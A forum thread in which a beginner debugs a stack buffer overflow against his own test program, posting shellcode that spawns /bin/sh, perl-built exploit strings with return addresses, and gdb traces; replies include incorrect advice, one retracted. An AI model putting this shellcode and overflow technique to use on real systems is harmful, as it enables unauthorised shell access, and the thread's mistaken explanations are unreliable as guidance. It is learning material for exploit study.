Buffer overflow exploiting error

[hackthissitehacker]

Hello,
I'm new and tried a buffer overflow. GDB also tells me that I successfully landed in the buffer (I checked rip with info frame), but the shellcode doesnt execute. I of course set the Stack executable (with execstack -s), but it still doesnt work. Here is the code and gdb output:


#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
char buff[80];
strcpy(buff, argv[1]);
return 1;

}

(gdb) r $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x15, "BCD" , "\xf0\xd9\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/maxim/Documents/Programming/c/tests/vuln3 $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x15, "BCD" , "\xf0\xd9\xff\xff\xff\x7f"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdb28) at vuln3.c:6
6 strcpy(buff, argv[1]);
(gdb) i f
Stack level 0, frame at 0x7fffffffda50:
rip = 0x4004d3 in main (vuln3.c:6); saved rip 0x3726a2132d
source language c.
Arglist at 0x7fffffffda40, args: argc=2, argv=0x7fffffffdb28
Locals at 0x7fffffffda40, Previous frame's sp is 0x7fffffffda50
Saved registers:
rbp at 0x7fffffffda40, rip at 0x7fffffffda48
(gdb) x/50x $rsp
0x7fffffffd9e0: 0xffffdb28 0x00007fff 0x00400500 0x00000002
0x7fffffffd9f0: 0x00000000 0x00000000 0x004003a3 0x00000000
0x7fffffffda00: 0xffffdb80 0x00007fff 0x00400545 0x00000000
0x7fffffffda10: 0x0e3080c0 0x00000000 0x00400500 0x00000000
0x7fffffffda20: 0x00000000 0x00000000 0x004003e0 0x00000000
0x7fffffffda30: 0xffffdb20 0x00007fff 0x00000000 0x00000000
0x7fffffffda40: 0x00000000 0x00000000 0x26a2132d 0x00000037
0x7fffffffda50: 0x00000000 0x00000000 0xffffdb28 0x00007fff
0x7fffffffda60: 0x00000000 0x00000002 0x004004c4 0x00000000
0x7fffffffda70: 0x00000000 0x00000000 0xe0856efd 0x3c1baa29
0x7fffffffda80: 0x004003e0 0x00000000 0xffffdb20 0x00007fff
0x7fffffffda90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdaa0: 0x54256efd 0xc3e455d6
(gdb) s
7 return 1;
(gdb) x/50x $rsp
0x7fffffffd9e0: 0xffffdb28 0x00007fff 0x00400500 0x00000002
0x7fffffffd9f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffda00: 0x90909090 0x485b1beb 0x4388c031 0x5b894807
0x7fffffffda10: 0x5b894808 0x480bb00c 0x480c4b8d 0xcd0c538d
0x7fffffffda20: 0xffe0e880 0x622fffff 0x732f6e69 0x41414e68
0x7fffffffda30: 0x42424141 0x41414242 0x41414141 0x41414141
0x7fffffffda40: 0x41414141 0x44434241 0xffffd9f0 0x00007fff
0x7fffffffda50: 0x00000000 0x00000000 0xffffdb28 0x00007fff
0x7fffffffda60: 0x00000000 0x00000002 0x004004c4 0x00000000
0x7fffffffda70: 0x00000000 0x00000000 0xe0856efd 0x3c1baa29
0x7fffffffda80: 0x004003e0 0x00000000 0xffffdb20 0x00007fff
0x7fffffffda90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdaa0: 0x54256efd 0xc3e455d6
(gdb) x/20x 0x7fffffffd9f0
0x7fffffffd9f0: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffda00: 0x90909090 0x485b1beb 0x4388c031 0x5b894807
0x7fffffffda10: 0x5b894808 0x480bb00c 0x480c4b8d 0xcd0c538d
0x7fffffffda20: 0xffe0e880 0x622fffff 0x732f6e69 0x41414e68
0x7fffffffda30: 0x42424141 0x41414242 0x41414141 0x41414141
(gdb) d
Delete all breakpoints? (y or n) n
(gdb) s
9 }
(gdb)
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x0: Input/output error.

(gdb) i f
Stack level 0, frame at 0x7fffffffda58:
rip = 0x7fffffffd9f0; saved rip 0x0
called by frame at 0x7fffffffda60
Arglist at 0x7fffffffda48, args:
Locals at 0x7fffffffda48, Previous frame's sp is 0x7fffffffda58
Saved registers:
rip at 0x7fffffffda50

when I do the step command:

(gdb) s
Cannot find bounds of current function

what am I doing wrong

PS: the shellcode works, I have tried it more than once and yes, it's 64 bit

[0phidian]

Not 100% sure but since your buffer is 80 bytes long shouldn't your NOP sled("\x90"x20) be longer than the length of the buffer. Also what is the output of the overflow normally(without gdb), "segmentation fault core dump"? How do you know the shell code works? Have you used it on other programs you compiled? I think some compilers a few measues built in to prevent buffer overflows.

[hackthissitehacker]

thx 4 ur fast reply Ophidian.

I assembled this shellcode:

.section .data

.globl main

main:
jmp ender

starter:
popq %rbx
xor %rax,%rax
mov %al, 0x07(%rbx)
movq %rbx, 0x08(%rbx)
mov %rbx, 0x0c(%rbx)
mov $11, %al
lea 0x0c(%rbx), %rcx
lea 0x0c(%rbx), %rdx
int $0x80
ender:
call starter
.string "/bin/shNAAAABBBB"

this is the standart shell launching code

i compiled it with
gcc -nostartfiles -nodefaultlibs -nostdlib launch_shell.s -Tlink.ld -o launch_shell.bin

link.ld is the linker script:

OUTPUT_FORMAT("binary")
ENTRY(main)
SECTIONS {
.text : {
*(.text)
}
.data : {
*(.data)
}
.bss : {
*(.bss)
}
}

then I hexdumped the output and put it in the programm to execute the shellcode(code follows)

char shellcode[] = "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07"\
"\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0"\
"\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c"\
"\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62"\
"\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41"\
"\x41\x42\x42\x42\x42\x00"; /* the shellcode */
int main (int argc, char **argv) {
int (*ret)(); /* ret is a function pointer */
ret = (int(*)())shellcode; /* ret points to our shellcode */
/* shellcode is type caste as a function */
(int)(*ret)(); /* execute, as a function, shellcode[] */
printf("Returned from shellcode!"); /* when using execve code, this will never be reached*/
exit(0); /* exit() */
}

I compiled it with "gcc shellcodetest.c -o shellcodetest" and did "execstack -s" and did run it. No problem to exec the shell here.

The buffer overflow program was compiled with "gcc buffer_overflow.c -o buffer_overflow" and the stack was set excutable with "execstack -s". Program source code is the one in my first post.

[0phidian]

Disclaimer: Buffer overflows are not my strongest point.
Your shellcode seems to works fine. The problem is that you are only writing the shell code into memory and not accessing it. So the shell code will never be called.
Solution change your c code:

Code: Select all

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
char buff[80];
strcpy(buff, argv[1]);
printf(buff);
return 1;

}


printing the buffer should run the shell code.

It worked for me anyways. It gave me the shell prompt in the middle of the output.

1��CH�H�[000-7fde0e367000 rw-p 00015000 08:06 6557312 /lib/x86_64-linu�-gnu/libgcc_s.so.1
7fde0e3670H�K7fde0e51a000 r-xp 00000000 08:06 6557291 /lib/x86_64-linux-gnH�Sibc-2.15.so
7fde0e51a000-7fd̀̀̀�����/bin/shNAAAABBBB�����@Normandy ~/Desktop $ ./a.out $(pe31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "\xf0\xd9\xff\xff\xff\x7f"')e\x41\x41\x���������������x42\x42", "\xf0\xd9\xff\xff\xff\x7f"') /lib/x8���������������libc-2.15.so
7fde0e71f000-7fde0e724000 rw-p 00000000 00:00 0
7fde0e724000-7fde0e746000 r-xp 00000000 08:06 6557271 /lib/x86_64-linux-gnu/ld-2.15.so
7fde0e924000-7fde0e927000 rw-p 00000000 00:00 0
7fde0e942000-7fde0e946000 rw-p 00000000 00:00 0
7fde0e946000-7fde0e947000 r--p 00022000 08:06 6557271 /lib/x86_64-linux-gnu/ld-2.15.so
7fde0e947000-7fde0e949000 rw-p 00023000 08:06 6557271 /lib/x86_64-linux-gnu/ld-2.15.so
7fffdcd44000-7fffdcd65000 rw-p 00000000 00:00 0 [stack]
7fffdcdff000-7fffdce00000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
�������������������������������


In order to get a root shell the program would need to be run with root permissions.

Hope this helps.

-- Fri Sep 21, 2012 2:51 pm --

Ooopps, nevermind that didnt work.
My bad, buffer overflows are not my best skill. It might be better if someone else helped you.

I do think the problem is getting a return address to fall on the NOP sled though.
I might mess around with this more later.

[hackthissitehacker]

I am just remembering that argv is of type char **, means a an array of pointers. So I looked at the first array index:
(gdb) print &argv[1]
$7 = (char **) 0x7fffffffdb30

now I've got the address of the pointer to the values.
(gdb) x/4x 0x7fffffffdb30
0x7fffffffdb30: 0xffffdf79 0x00007fff 0x00000000 0x00000000

now I have got the address of the values

(gdb) x/4x 0x7fffffffdf79
0x7fffffffdf79: 0x90909090 0x90909090 0x90909090 0x90909090

Here the buffer begins.

so I set up the breakpoint and ran it with:
(gdb) r $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x18 , "\x79\xdf\xff\xff\xff\x7f"')

Now I stepped stepped on

(gdb) s
7 return 1;
(gdb)<enter>
9 }

But then it gave me:
(gdb)<enter>
Warning:
Cannot insert breakpoint 0.
Error accessing memory address 0x0: Input/output error.

0x00007fffffffdf79 in ?? ()
(gdb)<enter>
Cannot find bounds of current function
(gdb)

hm...

I ran it again and continued:
(gdb) r $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x18 , "\x79\xdf\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/maxim/Documents/Programming/c/tests/vuln3 $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x18 , "\x79\xdf\xff\xff\xff\x7f"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdb28) at vuln3.c:6
6 strcpy(buff, argv[1]);
(gdb) c
Continuing.

Now the shellcode runs & runs & runs... I had to interrupt it:

^C
Program received signal SIGINT, Interrupt.
0x00007fffffffdfaa in ?? ()
(gdb)

I ran it again and stepped through the program and before it returned, I stepped only one assembler instruction (stepi):

(gdb) r $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x18 , "\x79\xdf\xff\xff\xff\x7f"')
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/maxim/Documents/Programming/c/tests/vuln3 $(perl -e 'print "\x90"x20, "\xeb\x1b\x5b\x48\x31\xc0\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x5b\x0c\xb0\x0b\x48\x8d\x4b\x0c\x48\x8d\x53\x0c\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42", "A"x18 , "\x79\xdf\xff\xff\xff\x7f"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdb28) at vuln3.c:6
6 strcpy(buff, argv[1]);
(gdb) s
7 return 1;
(gdb) s
9 }
(gdb) stepi
0x00000000004004f6 9 }
(gdb)
0x00007fffffffdf79 in ?? ()
(gdb)
0x00007fffffffdf7a in ?? ()
(gdb)

it is stepping through the nop sled, and I go on stepping until the shellcode starts:
(gdb)
0x00007fffffffdfaa in ?? ()
(gdb)
0x00007fffffffdf8f in ?? ()
(gdb)
0x00007fffffffdf90 in ?? ()
(gdb)
0x00007fffffffdf93 in ?? ()
(gdb)
0x00007fffffffdf96 in ?? ()
(gdb)
0x00007fffffffdf9a in ?? ()
(gdb)
0x00007fffffffdf9e in ?? ()
(gdb)
0x00007fffffffdfa0 in ?? ()
(gdb)
0x00007fffffffdfa4 in ?? ()
(gdb)
0x00007fffffffdfa8 in ?? ()
(gdb)
0x00007fffffffdfaa in ?? ()

as you can see it loops through the shellcode. Propably the execve() syscall has failed.

When I ran it with the same args in commandline, I get a SEGFAULT

What is happening here?

[not_essence2]

SEGFAULT means you tried to access something that isn't normally supposed to be accessed. So basically the buffer overflow, which is supposed to bypass the SEGFAULT by (you know what a buffer overflow does), did not work, and the computer detected the illegal command you tried to input once it overflowed.

[hackthissitehacker]

Thanks for your replies!

But as I said, in the debugger the code doesn't crash, but loop infinitly. Also I told you that I already landed in the Buffer...

Strange...